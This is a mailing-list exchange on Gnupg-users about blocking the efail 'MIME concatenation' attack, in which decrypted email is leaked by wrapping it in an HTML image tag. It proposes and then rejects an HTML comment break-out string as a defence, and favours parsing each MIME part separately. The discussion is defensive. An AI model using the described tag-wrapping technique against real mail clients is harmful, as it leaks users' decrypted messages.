Breaking MIME concatenation

Patrick Brunschwig patrick at enigmail.net
Tue May 15 17:44:17 CEST 2018


On 15.05.18 16:59, Andrew Gallagher wrote:
> It struck me at lunch that it might be possible for gnupg itself to
> scupper the MIME concatenation (direct exfiltration) technique mentioned
> in efail, and thereby plug the leaks in multiple vulnerable clients at
> once. This would however require it to be naughty with its output.
> 
> MIME concatenation works because in many clients the individual MIME
> parts of a message are not kept isolated from each other after they are
> passed to the rendering engine. Instead, they are concatenated together
> into a single document, perhaps with some separator such as an hline.
> This is dangerous because an HTML parser will interpret that document as
> a single unit, breaking all sorts of same-origin hygiene.
> 
> The primary technique for exfiltration is to wrap the target document in
> an active HTML tag such as <img href="....">. But HTML requires the
> quoted string to be safe, and there is no way for the efail attack to
> perform input sanitation on the target document before the HTML parser
> gets its hands on it.
> 
> Bear with me, because this is *not* a fully thought-out plan, merely an
> idea. ;-)
> 
> So gnupg could (under circumstances likely to prevail inside a mail
> client) prefix and/or suffix its output with an HTML content-injection
> string specially designed to break out of whatever active element the
> efail attack might be using. It could be as simple as prefacing the
> output document with the perfectly valid HTML tag:
> 
> <!-- "></html>" -->

I already tried a while ago to trick the Thunderbird HTML rendering
engine with tricks like this... They don't work. The rendering engine
ignores the </html> tag (and also tags like </body>).

I think the correct solution must be to treat each MIME part
independently, i.e. it needs to be parsed independently by the HTML
engine and produce its own DOM tree. At the end, you can concatenate
these DOM trees and create a single correct HTML document.

-Patrick

-Patrick



More information about the Gnupg-users mailing list